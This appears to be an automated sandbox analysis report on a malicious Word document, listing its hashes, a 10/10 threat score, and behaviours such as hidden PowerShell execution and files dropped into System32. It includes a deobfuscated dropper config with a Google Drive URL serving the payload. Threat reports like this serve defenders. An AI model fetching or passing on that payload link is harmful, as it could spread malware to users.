General

  • Target

    seebestthingswithreadyforgoodthingstogetmebackwithnice________________verynicepeopleswithoofdthingswh9chreallynicefrogoofdpeoples________verygoodpeopleswithnew.doc

  • Size

    111KB

  • Sample

    241029-qqbfaaxjcm

  • MD5

    b2daf885c5199ed93bfdafe0f3a33ae6

  • SHA1

    3d2dba1d76e2bfcae449113de1597d0c725b3421

  • SHA256

    e164bb4a190f79c58b836441a8f59bf3ead186f359fbac64b0e86e7e058c0efe

  • SHA512

    662cf497918cabc230d8f857826cf6ed67b58288bd1dd8f61c617fe41b0a9034acc957716aa6f4e860d5546652d158be9b0aaec231034a8dad5a533dcb8381e2

  • SSDEEP

    384:GSXY16lFxTu95qsyeYJZw9IHJkJhvO6CC9GBRKdEQj3Mh/xyc11wtSuQO7HBLOWk:hXc/XBoGGBgnj3Mh/71wtSuQULOWk

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Targets

    • Target

      seebestthingswithreadyforgoodthingstogetmebackwithnice________________verynicepeopleswithoofdthingswh9chreallynicefrogoofdpeoples________verygoodpeopleswithnew.doc

    • Size

      111KB

    • MD5

      b2daf885c5199ed93bfdafe0f3a33ae6

    • SHA1

      3d2dba1d76e2bfcae449113de1597d0c725b3421

    • SHA256

      e164bb4a190f79c58b836441a8f59bf3ead186f359fbac64b0e86e7e058c0efe

    • SHA512

      662cf497918cabc230d8f857826cf6ed67b58288bd1dd8f61c617fe41b0a9034acc957716aa6f4e860d5546652d158be9b0aaec231034a8dad5a533dcb8381e2

    • SSDEEP

      384:GSXY16lFxTu95qsyeYJZw9IHJkJhvO6CC9GBRKdEQj3Mh/xyc11wtSuQO7HBLOWk:hXc/XBoGGBgnj3Mh/71wtSuQULOWk

    Score
    10/10
    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks